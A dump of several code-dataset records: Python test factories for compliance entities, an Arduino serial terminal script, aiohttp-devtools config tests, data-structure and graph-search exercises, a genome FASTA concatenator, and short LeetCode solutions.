code=code,\n state=state, last_update=last_update)\n return program_entity\n\n @classmethod\n def _create_random_program(cls):\n \"\"\"Create Program entity with randomly and predictably filled fields.\"\"\"\n random_program = entity.ProgramEntity()\n random_program.title = cls.generate_title(cls.obj_program)\n random_program.type = cls.obj_program\n random_program.code = cls.generate_code()\n random_program.manager = roles.DEFAULT_USER\n random_program.primary_contact = roles.DEFAULT_USER\n random_program.state = element.ObjectStates.DRAFT\n return random_program\n\n\nclass ControlsFactory(EntitiesFactory):\n \"\"\"Factory class for 
Controls entities.\"\"\"\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Control object.\"\"\"\n empty_control = entity.ControlEntity()\n empty_control.type = cls.obj_control\n return empty_control\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n owner=None, primary_contact=None, code=None, state=None,\n last_update=None):\n \"\"\"Create Control object.\n Random values will be used for title and code.\n Predictable values will be used for type, owner, primary_contact, state.\n \"\"\"\n control_entity = cls._create_random_control()\n control_entity = cls.update_obj_attrs_values(\n obj=control_entity, title=title, id=id, href=href, url=url, type=type,\n owner=owner, primary_contact=primary_contact, code=code, state=state,\n last_update=last_update)\n return control_entity\n\n @classmethod\n def _create_random_control(cls):\n \"\"\"Create Control entity with randomly and predictably filled fields.\"\"\"\n random_control = entity.ControlEntity()\n random_control.title = cls.generate_title(cls.obj_control)\n random_control.type = cls.obj_control\n random_control.code = cls.generate_code()\n random_control.owner = roles.DEFAULT_USER\n random_control.primary_contact = roles.DEFAULT_USER\n random_control.state = element.ObjectStates.DRAFT\n return random_control\n\n\nclass AuditsFactory(EntitiesFactory):\n \"\"\"Factory class for Audit entity.\"\"\"\n\n @classmethod\n def clone(cls, audit, count_to_clone=1):\n \"\"\"Clone Audit object.\n Predictable values will be used for title, id, href, url, code.\n \"\"\"\n # pylint: disable=anomalous-backslash-in-string\n from lib.service.rest_service import ObjectsInfoService\n actual_count_all_audits = ObjectsInfoService().get_total_count(\n obj_name=objects.get_normal_form(cls.obj_audit, with_space=False))\n if actual_count_all_audits == audit.id:\n return [\n cls.update_obj_attrs_values(\n obj=copy.deepcopy(audit),\n title=audit.title + \" - copy \" + str(num), id=audit.id + num,\n href=re.sub(\"\\d+$\", str(audit.id + num), audit.href),\n url=re.sub(\"\\d+$\", str(audit.id + num), audit.url),\n code=(cls.obj_audit.upper() + \"-\" + str(audit.id + num))) for\n num in xrange(1, count_to_clone + 1)]\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Audit object.\"\"\"\n empty_audit = entity.AuditEntity()\n empty_audit.type = cls.obj_audit\n return empty_audit\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n program=None, audit_lead=None, code=None, status=None,\n last_update=None):\n \"\"\"Create Audit object.\n Random values will be used for title and code.\n Predictable values will be used for type, audit_lead, status.\n \"\"\"\n audit_entity = cls._create_random_audit()\n audit_entity = cls.update_obj_attrs_values(\n obj=audit_entity, title=title, id=id, href=href, url=url, type=type,\n program=program, audit_lead=audit_lead, code=code, status=status,\n last_update=last_update)\n return audit_entity\n\n @classmethod\n def _create_random_audit(cls):\n \"\"\"Create Audit entity with randomly and predictably filled fields.\"\"\"\n random_audit = entity.AuditEntity()\n random_audit.title = cls.generate_title(cls.obj_audit)\n random_audit.type = cls.obj_audit\n random_audit.code = cls.generate_code()\n random_audit.audit_lead = roles.DEFAULT_USER\n random_audit.status = element.AuditStates().PLANNED\n return random_audit\n\n\nclass AssessmentTemplatesFactory(EntitiesFactory):\n \"\"\"Factory class for Assessment Templates entities.\"\"\"\n\n 
@classmethod\n def clone(cls, asmt_tmpl, count_to_clone=1):\n \"\"\"Clone Assessment Template object.\n Predictable values will be used for title, id, href, url, code.\n \"\"\"\n # pylint: disable=anomalous-backslash-in-string\n from lib.service.rest_service import ObjectsInfoService\n actual_count_all_asmt_tmpls = ObjectsInfoService().get_total_count(\n obj_name=objects.get_normal_form(cls.obj_asmt_tmpl, with_space=False))\n if actual_count_all_asmt_tmpls == asmt_tmpl.id:\n return [\n cls.update_obj_attrs_values(\n obj=copy.deepcopy(asmt_tmpl), id=asmt_tmpl.id + num,\n href=re.sub(\"\\d+$\", str(asmt_tmpl.id + num), asmt_tmpl.href),\n url=re.sub(\"\\d+$\", str(asmt_tmpl.id + num), asmt_tmpl.url),\n code=(\"TEMPLATE-\" + str(asmt_tmpl.id + num))) for\n num in xrange(1, count_to_clone + 1)]\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Assessment Template object.\"\"\"\n empty_asmt_tmpl = entity.AssessmentTemplateEntity()\n empty_asmt_tmpl.type = cls.obj_asmt_tmpl\n return empty_asmt_tmpl\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n audit=None, asmt_objects=None, def_assessors=None,\n def_verifiers=None, code=None, last_update=None):\n \"\"\"Create Assessment Template object.\n Random values will be used for title and code.\n Predictable values will be used for type, asmt_objects, def_assessors,\n def_verifiers.\n \"\"\"\n asmt_tmpl_entity = cls._create_random_asmt_tmpl()\n asmt_tmpl_entity = cls.update_obj_attrs_values(\n obj=asmt_tmpl_entity, title=title, id=id, href=href, url=url,\n type=type, audit=audit, asmt_objects=asmt_objects,\n def_assessors=def_assessors, def_verifiers=def_verifiers, code=code,\n last_update=last_update)\n return asmt_tmpl_entity\n\n @classmethod\n def _create_random_asmt_tmpl(cls):\n \"\"\"Create Assessment Template entity with randomly and predictably\n filled fields.\n \"\"\"\n random_asmt_tmpl = entity.AssessmentTemplateEntity()\n random_asmt_tmpl.title = cls.generate_title(cls.obj_asmt_tmpl)\n random_asmt_tmpl.type = cls.obj_asmt_tmpl\n random_asmt_tmpl.code = cls.generate_code()\n random_asmt_tmpl.asmt_objects = objects.CONTROLS\n random_asmt_tmpl.def_assessors = roles.OBJECT_OWNERS\n random_asmt_tmpl.def_verifiers = roles.OBJECT_OWNERS\n return random_asmt_tmpl\n\n\nclass AssessmentsFactory(EntitiesFactory):\n \"\"\"Factory class for Assessments entities.\"\"\"\n\n @classmethod\n def generate(cls, objs_under_asmt_tmpl, audit):\n \"\"\"Generate Assessment object.\n Predictable values will be used for title, code, audit.\n \"\"\"\n # pylint: disable=too-many-locals\n from lib.service.rest_service import ObjectsInfoService\n actual_count_all_asmts = ObjectsInfoService().get_total_count(\n obj_name=objects.get_normal_form(cls.obj_asmt, with_space=False))\n return [\n cls.create(\n title=obj_under_asmt_tmpl.title + \" assessment for \" + audit.title,\n code=(cls.obj_asmt.upper() + \"-\" + str(asmt_number)),\n audit=audit.title) for asmt_number, obj_under_asmt_tmpl in\n enumerate(objs_under_asmt_tmpl, start=actual_count_all_asmts + 1)]\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Assessment object.\"\"\"\n empty_asmt = entity.AssessmentEntity()\n empty_asmt.type = cls.obj_asmt\n return empty_asmt\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n object=None, audit=None, creators=None, assignees=None,\n primary_contact=None, is_verified=None, code=None, state=None,\n last_update=None):\n \"\"\"Create Assessment object.\n Random values will be 
used for title and code.\n Predictable values will be used for type, object, creators, assignees,\n state, is_verified.\n \"\"\"\n # pylint: disable=too-many-locals\n asmt_entity = cls._create_random_asmt()\n asmt_entity = cls.update_obj_attrs_values(\n obj=asmt_entity, title=title, id=id, href=href, url=url, type=type,\n object=object, audit=audit, creators=creators, assignees=assignees,\n primary_contact=primary_contact, is_verified=is_verified, code=code,\n state=state, last_update=last_update)\n return asmt_entity\n\n @classmethod\n def _create_random_asmt(cls):\n \"\"\"Create Assessment entity with randomly and predictably filled fields.\"\"\"\n random_asmt = entity.AssessmentEntity()\n random_asmt.title = cls.generate_title(cls.obj_asmt)\n random_asmt.type = cls.obj_asmt\n random_asmt.code = cls.generate_code()\n random_asmt.object = roles.DEFAULT_USER\n random_asmt.creators = roles.DEFAULT_USER\n random_asmt.assignees = roles.DEFAULT_USER\n random_asmt.state = element.AssessmentStates.NOT_STARTED\n random_asmt.is_verified = element.Common.FALSE\n return random_asmt\n\n\nclass IssuesFactory(EntitiesFactory):\n \"\"\"Factory class for Issues entities.\"\"\"\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Issue object.\"\"\"\n empty_issue = entity.IssueEntity\n empty_issue.type = cls.obj_issue\n return empty_issue\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n audit=None, owner=None, primary_contact=None, code=None,\n state=None, last_update=None):\n \"\"\"Create Issue object.\n Random values will be used for title and code.\n Predictable values will be used for type, owner, primary_contact, state.\n \"\"\"\n issue_entity = cls._create_random_issue()\n issue_entity = cls.update_obj_attrs_values(\n obj=issue_entity, title=title, id=id, href=href, url=url, type=type,\n audit=audit, owner=owner, primary_contact=primary_contact, code=code,\n state=state, last_update=last_update)\n return issue_entity\n\n @classmethod\n def _create_random_issue(cls):\n \"\"\"Create Issue entity with randomly and predictably filled fields.\"\"\"\n random_issue = entity.IssueEntity()\n random_issue.title = cls.generate_title(cls.obj_issue)\n random_issue.type = cls.obj_issue\n random_issue.code = cls.generate_code()\n random_issue.owner = roles.DEFAULT_USER\n random_issue.primary_contact = roles.DEFAULT_USER\n random_issue.state = element.IssueStates.DRAFT\n return random_issue\n","sub_path":"test/selenium/src/lib/entities/entities_factory.py","file_name":"entities_factory.py","file_ext":"py","file_size_in_byte":18414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"653234425","text":"import serial as ser\nimport time\ncommands=['D2 HIGH','D2 LOW',\n\t\t'D3 HIGH', 'D3 LOW',\n\t\t'D4 HIGH', 'D4 LOW',\n\t\t'D5 HIGH', 'D5 LOW',\n\t\t'D6 HIGH', 'D6 LOW',\n\t\t'D7 HIGH', 'D7 LOW',\n\t\t'D8 HIGH', 'D8 LOW',\n\t\t'D9 HIGH', 'D9 LOW',\n\t 'D10 HIGH','D10 LOW',\n\t 'D11 HIGH','D11 LOW',\n\t 'D12 HIGH','D12 LOW',\n\t 'D13 HIGH','D13 LOW',\n\t 'D2 READ' ,\n\t 'D3 READ' ,\n\t 'D4 READ' ,\n\t 'D5 READ' ,\n\t 'D6 READ' ,\n\t 'D7 READ' ,\n\t 'D8 READ' ,\n\t 'D9 READ' ,\n\t 'D10 READ' ,\n\t 'D11 READ' ,\n\t 'D12 READ' ,\n\t 'D13 READ' ,\n\t \t\t\t'A0 READ',\n\t \t\t\t'A1 READ',\n\t \t\t\t'A2 READ',\n\t \t\t\t'A3 READ',\n\t \t\t\t'A4 READ',\n\t \t\t\t'A5 READ']\n\nuser=str(input(\"What is your name: \"))\nport_=str(input(\"Enter the port to connect: 
\"))\n\ntry:\n\tboard=ser.Serial(port_,115200,timeout=0.1)\nexcept ser.serialutil.SerialException:\n\tprint(\"Board is offline\")\n\tquit()\nif board.isOpen():\n\tboard.close()\n\nboard.open()\nnow=time.time()\nconStr=\"\"\nn=0\nboard.write(\"TASIN_FIRMATA_VER\".encode())\nwhile n<=50:\n\tc=board.read()\n\tc=str(c)\n\tc=c.encode()\n\tif c!=\"\\n\":\n\t\tconStr=conStr+c\n\t\tn=n+1\n\telif c==\"\\n\":\n\t\tbreak\nif conStr==\"\":\n\tprint(\"TASIN_FIRMATA is not installed on the board @ {}. \\nGet it on https://github.com/NurTasin/tasinfirmata.git. \\nInstall the firmware on UNO and reset the Arduino\".format(board.port))\n\tquit()\nelse:\n\tprint(\"TASIN_FIRMATA Found . Version: {}\".format(conStr))\nprint(\"Board is online now @{} @{} b/s\".format(board.port,board.baudrate))\nwhile True:\n\tcommand=str(input(\"{}@TASIN_FIRMATA:{}/ $\".format(user,board.port)))\n\tif command=='quit':\n\t\tbreak\n\telif command in commands:\n\t\tboard.write(command.encode())\n\t\tfinalStr=\"\"\n\t\twhile True:\n\t\t\toutput=board.read()\n\t\t\toutput=str(output)\n\t\t\toutput=output.decode()\n\t\t\tif output!=\"\\n\":\n\t\t\t\tfinalStr=finalStr+output\n\t\t\telif output==\"\\n\":\n\t\t\t\tbreak\n\t\tprint(finalStr)\n\telif command not in commands:\n\t\tprint(\"{}: no command found\".format(command))\n\nboard.close()\n","sub_path":"tasinFirmata_terminal_python3.x.py","file_name":"tasinFirmata_terminal_python3.x.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"610744363","text":"import pytest\nfrom pytest_toolbox import mktree\n\nfrom aiohttp_devtools.exceptions import AiohttpDevConfigError\nfrom aiohttp_devtools.runserver.config import Config\n\nfrom .conftest import SIMPLE_APP, get_if_boxed\n\nif_boxed = get_if_boxed(pytest)\n\n\nasync def test_load_simple_app(tmpworkdir):\n mktree(tmpworkdir, SIMPLE_APP)\n Config(app_path='app.py')\n\n\nasync def test_create_app_wrong_name(tmpworkdir, loop):\n mktree(tmpworkdir, SIMPLE_APP)\n with pytest.raises(AiohttpDevConfigError) as excinfo:\n Config(app_path='app.py', app_factory_name='missing')\n assert excinfo.value.args[0] == 'Module \"app.py\" does not define a \"missing\" attribute/class'\n\n\ninvalid_apps = [\n (\n {\n 'foo': 'bar',\n },\n 'unable to find a recognised default file (\"app.py\" or \"main.py\") in the directory \".\"'\n ),\n (\n {\n 'app.py': \"\"\"\\\ndef not_a_default_name(loop):\n pass\"\"\"\n },\n 'No name supplied and no default app factory found in app.py'\n ),\n (\n {\n 'app.py': 'create_app = 4',\n },\n 'app_factory \"create_app\" is not callable or an instance of aiohttp.web.Application'\n ),\n (\n {\n 'app.py': \"\"\"\\\ndef app_factory(loop):\n return 43\"\"\",\n },\n 'app factory \"app_factory\" returned \"int\" not an aiohttp.web.Application'\n )\n]\n\n\n@if_boxed\n@pytest.mark.parametrize('files,exc', invalid_apps, ids=['%s...' 
% v[1][:40] for v in invalid_apps])\ndef test_invalid_options(tmpworkdir, files, exc, loop):\n mktree(tmpworkdir, files)\n with pytest.raises(AiohttpDevConfigError) as excinfo:\n Config(app_path='.').check(loop)\n assert exc.format(tmpworkdir=tmpworkdir) == excinfo.value.args[0]\n","sub_path":"tests/test_runserver_config.py","file_name":"test_runserver_config.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"164411846","text":"# Author: Jessica Strait\r\n# This project uses my own queue code to conduct a breadth-first sort.\r\n# It also uses my own stack code to conduct a depth-first sort.\r\n# It also runs Dijkstra's algorithm to produce a dictionary with the shortest path to each node.\r\n\r\nclass StackNode:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def __str__(self):\r\n return \"Node({})\".format(self.value)\r\n\r\n __repr__ = __str__\r\n\r\n\r\nclass Stack:\r\n\r\n def __init__(self):\r\n self.top = None\r\n\r\n def __str__(self):\r\n temp = self.top\r\n out = []\r\n while temp:\r\n out.append(str(temp.value))\r\n temp = temp.next\r\n out = '\\n'.join(out)\r\n return ('Top:{}\\nStack:\\n{}'.format(self.top, out))\r\n\r\n __repr__ = __str__\r\n\r\n def isEmpty(self):\r\n # This is where my code begins. I will start by checking to see if self.top exists.\r\n if self.top is None:\r\n # If there is no self.top, then the stack must be empty and we return true.\r\n return True\r\n else:\r\n # Otherwise, the stack is not empty and we return false.\r\n return False\r\n\r\n def __len__(self):\r\n # I'll set a temp value equal to the top of the stack, and a count variable at 0.\r\n temp = self.top\r\n count = 0\r\n # We'll traverse the stack with a while loop, adding one as long as our temp value is not none.\r\n while temp is not None:\r\n count += 1\r\n temp = temp.next\r\n # Then we return our count value.\r\n return count\r\n\r\n def peek(self):\r\n # If there is no self.top, then the stack is empty and there is nothing for us to peek.\r\n if self.top is None:\r\n return 'Stack is empty'\r\n else:\r\n # Otherwise, we return self.top. Remember to use the value function so we don't get a node!\r\n return self.top.value\r\n\r\n def push(self, value):\r\n # First, we need to create an instance of class Node at our new value. We'll call that new_node\r\n new_node = StackNode(value)\r\n # I'll set a temp variable at self.top: this is the only end we can push to.\r\n temp = self.top\r\n # I'll place our new node so it is just in front of that temp variable (the top of the stack).\r\n new_node.next = temp\r\n # Then, I'll reassign self.top as our new node. 
We don't need to return anything\r\n self.top = new_node\r\n\r\n def pop(self):\r\n # If the stack is empty, we can't pop anything.\r\n if self.top is None:\r\n return 'Stack is empty'\r\n else:\r\n # I'll set a temp variable at the top of the stack: this is the only end we can pop from.\r\n temp = self.top\r\n # I'll check the value of the top of the stack and create a variable to save it for later.\r\n return_value = temp.value\r\n # I need to reassign self.top as the value after that temp variable.\r\n self.top = temp.next\r\n # I can delete my temp item entirely.\r\n del temp\r\n # Now, I return the variable that I saved for later.\r\n return return_value\r\n\r\n\r\nclass QueueNode:\r\n\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def __str__(self):\r\n return \"Node({})\".format(self.value)\r\n\r\n __repr__ = __str__\r\n\r\n\r\nclass Queue:\r\n\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def __str__(self):\r\n temp = self.head\r\n out = []\r\n while temp:\r\n out.append(str(temp.value))\r\n temp = temp.next\r\n out = ' '.join(out)\r\n return ('Head:{}\\nTail:{}\\nQueue:{}'.format(self.head, self.tail, out))\r\n\r\n __repr__ = __str__\r\n\r\n def isEmpty(self):\r\n # This is where my code begins. I will check to see if self.head is none: if it is, the queue must be empty.\r\n if self.head is None:\r\n return True\r\n else:\r\n # Otherwise, the queue is not empty and we return False.\r\n return False\r\n\r\n def __len__(self):\r\n # I'll create a temp value starting at self.head, the \"front\" of the queue. I'll also set a count variable to 0.\r\n temp = self.head\r\n count = 0\r\n # We'll traverse the list until the temp value is none, meaning we've reached the end of the queue. For each\r\n # item, we increase our count value by 1.\r\n while temp is not None:\r\n count += 1\r\n temp = temp.next\r\n # Then we return our count variable.\r\n return count\r\n\r\n def enqueue(self, value):\r\n # If the queue is not empty, we need to examine the tail of the queue.\r\n if self.head is not None:\r\n # We'll create an instance of class Node at our value and call it new_node.\r\n new_node = QueueNode(value)\r\n # I'll set a temp value to the existing tail of the queue.\r\n temp = self.tail\r\n # I'll let the value after the temp variable equal our new node.\r\n temp.next = new_node\r\n # Then, I'll reassign self.tail as the new_node.\r\n self.tail = new_node\r\n else:\r\n # If the queue is empty, we still instantiate class Node at our value.\r\n new_node = QueueNode(value)\r\n # Because the queue is empty, self.head and self.tail will both equal new_node until new items are enqueued.\r\n self.head = new_node\r\n self.tail = new_node\r\n\r\n def dequeue(self):\r\n # First, we must check if the queue is empty.\r\n if self.head is not None:\r\n # Then, we need to check if the queue has only one value.\r\n if self.head == self.tail:\r\n # I'll set a variable at self.head, chosen arbitrarily over self.tail since there is only one item.\r\n item = self.head\r\n # I'll save the value of my item for returning later.\r\n return_value = item.value\r\n # I'm setting both self.head and self.tail to \"item.next,\" which is simply None. 
When we have dequeued\r\n # the item variable, these values should both be none.\r\n self.head = item.next\r\n self.tail = item.next\r\n # Then I delete my single item.\r\n del item\r\n # We return the value that we saved earlier.\r\n return return_value\r\n else:\r\n # If the queue has at least two values, we only examine self.head. I'll call it an item variable.\r\n item = self.head\r\n # I'll save the value of my item for returning later.\r\n return_value = item.value\r\n # I'll set the new self.head to the next item in the queue after my item.\r\n self.head = item.next\r\n # Then I delete my item.\r\n del item\r\n # We return the value that we saved earlier.\r\n return return_value\r\n else:\r\n # If the queue is empty, we cannot dequeue anything.\r\n return 'Queue is empty'\r\n\r\nclass Graph:\r\n def __init__(self, graph_repr):\r\n self.vertList = graph_repr\r\n\r\n# Breadth-first sort\r\n\r\n def bfs(self, start):\r\n # First, I want to check and make sure that the start variable is in the graph representation.\r\n if start not in self.vertList:\r\n return 'error'\r\n # I'll create a new instance of class queue.\r\n q = Queue()\r\n # I'll enqueue my \"start\" value.\r\n q.enqueue(start)\r\n # This empty list will hold each visited node, and will be what I return.\r\n visited_nodes = []\r\n # I can go ahead and append my \"start\" value to that list.\r\n visited_nodes.append(start)\r\n # I can use my isEmpty() function to check that the queue still has values in it.\r\n while not q.isEmpty():\r\n # This variable stores that values that I'm removing from the queue.\r\n dequeued_node = q.dequeue()\r\n # This for loop traverses a sorted list of all the neighbors to each dequeued item. Remember, we need to use\r\n # alphabetical order, so this sorting is important.\r\n for new_node in sorted(self.vertList[dequeued_node]):\r\n # If the type is a tuple, then the graph is weighted and I can take the value at index 0 as my value to\r\n # be appended in the output list.\r\n if type(new_node) == tuple:\r\n new_node = new_node[0]\r\n # Regardless, I need to check if my \"new_node\" variable is already in the visited nodes list.\r\n if new_node not in visited_nodes:\r\n # If it is not, I need to enqueue that value and append it to my output list. I need to enqueue it\r\n # so we can visit its neighbors with the next iteration. 
I must append it so it will be returned.\r\n q.enqueue(new_node)\r\n visited_nodes.append(new_node)\r\n # If the value is already in the visited_nodes list, I can just pass and continue with the loop.\r\n else:\r\n pass\r\n # The return value is the visited_nodes list that we created.\r\n return visited_nodes\r\n \r\n# Depth-first sort\r\n\r\n def dfs(self, start):\r\n # Your code starts here\r\n # As with BFS, I need to check that the start variable is in the graph representation.\r\n if start not in self.vertList:\r\n return 'error'\r\n # I'll instantiate class stack to help me out.\r\n s = Stack()\r\n # I can go ahead and push my start variable into the stack.\r\n s.push(start)\r\n # I'll create another empty visited_nodes list that I'll use as my output.\r\n visited_nodes = []\r\n # I can use my isEmpty() function to ensure that the stack is not empty.\r\n while not s.isEmpty():\r\n # I want to pop the top node on my stack.\r\n popped_node = s.pop()\r\n # If it a tuple, then we need to consider the value at index 0.\r\n if type(popped_node) == tuple:\r\n popped_node = popped_node[0]\r\n # Similar to BFS, we need to check that the popped node is not yet in the list.\r\n if popped_node not in visited_nodes:\r\n # If it isn't, we need to append the popped node.\r\n visited_nodes.append(popped_node)\r\n # We need to complete a DESCENDING sort on our list to make sure the order of our stack is correct as\r\n # the iterations continue. Remember, alphabetical order is important to us, and we are checking the\r\n # longest possible paths, so we will need to backtrack.\r\n for new_node in sorted(self.vertList[popped_node], reverse=True):\r\n # If the new node isn't in the visited_nodes list, we need to push it to the stack so we can deal\r\n # with it later.\r\n if new_node not in visited_nodes:\r\n s.push(new_node)\r\n # If the popped node is already in the list, we can just pass and continue the loop.\r\n else:\r\n pass\r\n # Again, we will return our value list as output.\r\n return visited_nodes\r\n\r\n# Dijkstra's algorithm\r\n\r\n def dijkstra(self, start):\r\n # As with BFS and DFS, I'll run the same check on the input to make sure the start value is correct.\r\n if start not in self.vertList:\r\n return 'error'\r\n # My output will be a dictionary, so I'll start with an empty one.\r\n output = {}\r\n # The visited nodes list we've been using will be helpful even if I'm not returning it.\r\n visited_nodes = []\r\n # I'm going to instantiate a queue.\r\n q = Queue()\r\n # For every node in the graph, I want to define its key in my dictionary as infinity for now.\r\n for node_value in self.vertList:\r\n output[node_value] = float('inf')\r\n # However, the key for my start value must be zero (because that will always be the shortest path to itself).\r\n output[start] = 0\r\n # Now, I'll enqueue my start variable.\r\n q.enqueue(start)\r\n # I'll use my isEmpty() function to check for values in the queue.\r\n while not q.isEmpty():\r\n # The vertex points are all in the queue, and we're going to go through them.\r\n vertex = str(q.dequeue())\r\n # For each neighbor of the vertex in the graph representation...\r\n for value in self.vertList[vertex]:\r\n # Let's make sure the edge we're traveling on isn't weighted. 
We may have to do some different things.\r\n if type(value) != tuple:\r\n # If the value has not yet been visited...\r\n if value not in visited_nodes:\r\n # I need to \"visit\" the node by adding it to the queue and making a note of it by appending it\r\n # to my list for future reference.\r\n visited_nodes.append(value)\r\n q.enqueue(value)\r\n # If the dictionary key of the neighbor is greater than the key of the vertex plus one, then I need\r\n # to reassign the key of my current neighbor.\r\n if output[value] > output[vertex] + 1:\r\n output[value] = output[vertex] + 1\r\n # Everything below here is for tuples, so I should continue if the value is not a tuple.\r\n continue\r\n # Now, if the value is a tuple, we need to check if the tuple at index zero has been visited.\r\n elif value[0] not in visited_nodes:\r\n # If it has not, we need to enqueue it and make a note just like we did for unweighted graphs.\r\n visited_nodes.append(value[0])\r\n q.enqueue(value[0])\r\n # Even though it looks more complicated because of the brackets, this is the same comparison that we did\r\n # earlier, but for a weighted graph. This means that our new path is shorter (and for this algorithm,\r\n # better), so we want to reassign its key to this new shorter path.\r\n if output[value[0]] > output[vertex] + value[1]:\r\n output[value[0]] = output[vertex] + value[1]\r\n # We are returning our dictionary with the shortest path possibilities saved as keys.\r\n return output\r\n","sub_path":"BFS-DFS-Dijkstra.py","file_name":"BFS-DFS-Dijkstra.py","file_ext":"py","file_size_in_byte":14673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"278191545","text":"# list of all E.coli genomes in `genome`\n\ndef make_cdhit(list_path, output_file, gene_path):\n '''\n input:\n list_path = genome lists. for example(/home/hermuba/data0118/genome_list/ecoli_rm_plasmid_1582)\n output_file = concatenated, added genome ID to the end\n gene_path = folder containing .faa from prodigal. For example:'/home/hermuba/data/genePredicted/'\n\n output: None\n '''\n # open genome list file\n f = open(list_path)\n genome = f.readlines()\n for i in range(len(genome)):\n genome[i] = genome[i].rstrip().replace(u'\\ufeff', '')\n\n #concat all .faa files into one single file\n from Bio import SeqIO\n outputHandle = open(output_file, 'a') # don't forget append mode or be stupid\n\n # read one files with SeqIO.parse() at a time\n for ID in genome:\n recordIter = SeqIO.parse(gene_path + ID + '.faa', \"fasta\")\n\n # iterate through SeqRecords, annotate with ID\n for record in recordIter:\n # record.id = 'JAPM01000001_1'\n record.id = record.id + '|' + ID\n # record.id = JAPM01000001_1|1328440.3\n\n # output to one fasta file: `E.coli_cdhit.faa`\n SeqIO.write(record, outputHandle, \"fasta\")\n\n outputHandle.close()\n","sub_path":"Genome/pangenome_build/concat_for_cdhit.py","file_name":"concat_for_cdhit.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170249629","text":"\"\"\"\nhttps://leetcode.com/problems/maximum-average-pass-ratio/\n\nFor each pair, compute benefit after addint the student to the class. \nThen do extraStudents update. 
\n\nTime compleixty: O(klogn), k = extraStudents, n = len(classes)\n\"\"\"\nclass Solution:\n def maxAverageRatio(self, classes: List[List[int]], extraStudents: int) -> float:\n heap = [(p/t - (p + 1)/(t+1), p, t) for p, t in classes]\n heapq.heapify(heap)\n while extraStudents:\n _, p, t = heapq.heappop(heap)\n heapq.heappush(heap, ((p+1)/(t+1) - (p+2)/(t+2), p+1, t+1))\n extraStudents -= 1\n\n ans = sum(p/t for _, p, t in heap)/len(heap)\n return ans","sub_path":"1792_MaximumAveragePassRatio.py","file_name":"1792_MaximumAveragePassRatio.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580450336","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 7)\n\n\ndef DFS(sv, mark):\n visit[sv] = mark\n\n for i in adjList[sv]:\n if not visit[i]:\n if not DFS(i, -mark):\n return False\n else:\n if visit[i] == mark:\n return False\n return True\n\n\nK = int(input())\n\nfor _ in range(K):\n V, E = map(int, input().split())\n\n adjList = [[] for _ in range(V + 1)]\n visit = [False] * (V + 1)\n\n for _ in range(E):\n sv, dv = map(int, input().split())\n\n adjList[sv].append(dv)\n adjList[dv].append(sv)\n\n isBG = True\n for i in range(1, V + 1):\n if not visit[i]:\n if not DFS(i, 1):\n isBG = False\n break\n \n print(\"YES\" if isBG else \"NO\")\n","sub_path":"BaekjoonOnlineJudge/1707/1707.py","file_name":"1707.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"630266319","text":"# Node class\n# class Node:\n#\n# # Constructor to initialize the node object\n# def __init__(self, data):\n# self.data = data\n# self.next = None\n#\n#\n# class LinkedList:\n#\n# # Function to initialize head\n# def __init__(self):\n# self.head = None\n#\n# def reverseUtil(self, curr, prev):\n#\n# # If last node mark it head\n# if curr.next is None:\n# self.head = curr\n#\n# # Update next to prev node\n# curr.next = prev\n# return\n#\n# # Save curr.next node for recursive call\n# next = curr.next\n#\n# # And update next\n# curr.next = prev\n#\n# self.reverseUtil(next, curr)\n#\n# # This function mainly calls reverseUtil()\n#\n# # with previous as None\n# def reverse(self):\n# if self.head is None:\n# return\n# self.reverseUtil(self.head, None)\n#\n# # Function to insert a new node at the beginning\n#\n# def push(self, new_data):\n# new_node = Node(new_data)\n# new_node.next = self.head\n# self.head = new_node\n#\n# # Utility function to print the linked LinkedList\n#\n# def printList(self):\n# temp = self.head\n# while (temp):\n# print(temp.data)\n# temp = temp.next\n\ndef main():\n cases = input()\n for i in range(0, cases):\n numNodes = input()\n l = []\n for j in range(0, numNodes):\n l.append(input())\n l.reverse()\n yield l\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"CiscoRotateLinkedList.py","file_name":"CiscoRotateLinkedList.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"549007714","text":"import logging\nfrom ebuildtester.docker import Docker\nfrom ebuildtester.parse import parse_commandline\nimport ebuildtester.options as options\nimport os.path\nimport sys\n\n\ndef main():\n \"\"\"The main function.\"\"\"\n\n options.init()\n\n options.log.setLevel(logging.DEBUG)\n\n options.options = parse_commandline(sys.argv[1:])\n\n options.log.info(\"creating container\")\n container = Docker(\n 
